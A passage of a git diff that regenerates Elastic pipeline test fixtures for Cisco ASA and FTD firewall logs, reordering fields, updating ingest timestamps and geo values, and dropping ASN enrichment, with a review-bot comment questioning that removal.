@@ -17623,25 +17620,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17651,12 +17645,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100557200Z", + "ingested": "2021-12-14T14:39:19.188542160Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 duration 0:00:30", "code": "305012", "kind": "event", @@ -17670,25 +17667,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17698,12 +17692,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100563200Z", + "ingested": "2021-12-14T14:39:19.188542607Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 duration 0:00:30", "code": "305012", "kind": "event", 
@@ -17717,25 +17714,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17745,12 +17739,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100569100Z", + "ingested": "2021-12-14T14:39:19.188543005Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:192.168.98.44/8307 duration 0:00:30", "code": "305012", "kind": "event", @@ -17764,7 +17761,10 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -17828,7 +17828,7 @@ "severity": 6, "duration": 4000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.100574900Z", + "ingested": "2021-12-14T14:39:19.188543399Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:192.168.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I", "code": "302014", "kind": "event", @@ -17910,7 +17910,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100580800Z", + "ingested": "2021-12-14T14:39:19.188543779Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -17991,7 +17991,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100586700Z", + "ingested": "2021-12-14T14:39:19.188544234Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18072,7 +18072,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100592500Z", + "ingested": "2021-12-14T14:39:19.188544707Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18153,7 +18153,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100598400Z", + "ingested": "2021-12-14T14:39:19.188545086Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:192.168.98.44/8310", "code": "305011", "kind": "event", @@ -18232,7 +18232,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100604500Z", + "ingested": "2021-12-14T14:39:19.188545465Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306)", "code": "302013", "kind": "event", @@ -18315,7 +18315,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100610200Z", + "ingested": "2021-12-14T14:39:19.188545856Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -18396,7 +18396,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100616100Z", + "ingested": "2021-12-14T14:39:19.188546247Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18477,7 +18477,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100622Z", + "ingested": "2021-12-14T14:39:19.188546639Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18558,7 +18558,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100627900Z", + "ingested": "2021-12-14T14:39:19.188547136Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18639,7 +18639,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100633800Z", + "ingested": "2021-12-14T14:39:19.188547517Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18720,7 +18720,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100639700Z", + "ingested": "2021-12-14T14:39:19.188547907Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -18801,7 +18801,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100644200Z", + "ingested": "2021-12-14T14:39:19.188548292Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18882,7 +18882,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100647800Z", + "ingested": "2021-12-14T14:39:19.188548700Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18963,7 +18963,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100652300Z", + "ingested": "2021-12-14T14:39:19.188549085Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19044,7 +19044,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100657600Z", + "ingested": "2021-12-14T14:39:19.188549479Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19125,7 +19125,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100663100Z", + "ingested": "2021-12-14T14:39:19.188550089Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -19206,7 +19206,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100669Z", + "ingested": "2021-12-14T14:39:19.188550499Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19287,7 +19287,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100673400Z", + "ingested": "2021-12-14T14:39:19.188550967Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19368,7 +19368,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100677800Z", + "ingested": "2021-12-14T14:39:19.188551652Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19449,7 +19449,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100681500Z", + "ingested": "2021-12-14T14:39:19.188552229Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19530,7 +19530,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100686Z", + "ingested": "2021-12-14T14:39:19.188552891Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -19611,7 +19611,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100691900Z", + "ingested": "2021-12-14T14:39:19.188553323Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19692,7 +19692,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100697800Z", + "ingested": "2021-12-14T14:39:19.188553709Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19773,7 +19773,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100703800Z", + "ingested": "2021-12-14T14:39:19.188554118Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19854,7 +19854,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100709700Z", + "ingested": "2021-12-14T14:39:19.188554498Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19935,7 +19935,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100715500Z", + "ingested": "2021-12-14T14:39:19.188554889Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -20016,7 +20016,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100721300Z", + "ingested": "2021-12-14T14:39:19.188555296Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20097,7 +20097,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100727200Z", + "ingested": "2021-12-14T14:39:19.188555680Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20178,7 +20178,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100733200Z", + "ingested": "2021-12-14T14:39:19.188556070Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20259,7 +20259,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100739200Z", + "ingested": "2021-12-14T14:39:19.188556460Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20340,7 +20340,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100745Z", + "ingested": "2021-12-14T14:39:19.188556840Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -20421,7 +20421,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100750900Z", + "ingested": "2021-12-14T14:39:19.188557230Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20502,7 +20502,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100756800Z", + "ingested": "2021-12-14T14:39:19.188557636Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20583,7 +20583,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100762700Z", + "ingested": "2021-12-14T14:39:19.188558026Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20664,7 +20664,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100768500Z", + "ingested": "2021-12-14T14:39:19.188558412Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20745,7 +20745,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100774300Z", + "ingested": "2021-12-14T14:39:19.188558792Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -20826,7 +20826,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100779800Z", + "ingested": "2021-12-14T14:39:19.188559180Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20907,7 +20907,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100783900Z", + "ingested": "2021-12-14T14:39:19.188559564Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json index 6c4c303ea09..6b29f4ac50c 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json 
@@ -4,37 +4,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "A" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 145, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "A" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -43,15 +37,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
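Review bot: The new expected output in this hunk drops the `destination.as` object (`"number": 20712`, organization `"Andrews & Arnold Ltd"`) entirely, while `destination.geo` is only re-valued, so the fixture now asserts that ASN enrichment for 81.2.69.144 does not occur at all. If the test GeoIP bundle shipped with the bumped elastic-package no longer contains an ASN database this is expected, but if it still does, the pipeline's ASN geoip processor may have silently stopped matching and the regenerated fixture would be cementing a regression rather than documenting a database change. This is worth confirming against the pipeline definition, since `destination.as.*` fields are commonly relied on by detection rules and dashboards. The same `destination.as` removal recurs in the other test-dns hunks on this page (those headed `@@ -153`, `@@ -304`, `@@ -453`, `@@ -604`, `@@ -754` and `@@ -903`).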
@@ -90,7 +84,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.912948400Z", + "ingested": "2021-12-14T14:39:57.642426319Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57379, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 145, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: a host address, DNS_TTL: 70", "code": "430003", "kind": "event", @@ -153,37 +147,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "AAAA" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 193, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "AAAA" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", 
@@ -192,15 +180,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -239,7 +227,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.912957800Z", + "ingested": "2021-12-14T14:39:57.642428713Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 51389, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299", "code": "430003", "kind": "event", 
@@ -304,37 +292,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "CNAME" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "CNAME" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -343,15 +325,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -390,7 +372,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.912964300Z", + "ingested": "2021-12-14T14:39:57.642429175Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899", "code": "430003", "kind": "event", @@ -453,37 +435,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "www.elastic.co", - "type": "A" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 200, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "www.elastic.co", + "type": "A" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", 
@@ -492,15 +468,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -539,7 +515,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.912970200Z", + "ingested": "2021-12-14T14:39:57.642429636Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55371, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 97, ResponderBytes: 200, NAPPolicy: Balanced Security and Connectivity, DNSQuery: www.elastic.co, DNSRecordType: a host address, DNS_TTL: 12", "code": "430003", "kind": "event", 
@@ -604,37 +580,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "AAAA" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 193, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "AAAA" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -643,15 +613,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -690,7 +660,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.912976100Z", + "ingested": "2021-12-14T14:39:57.642430030Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 60441, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299, DNSResponseType: No error", "code": "430003", "kind": "event", @@ -754,37 +724,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "CNAME" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + 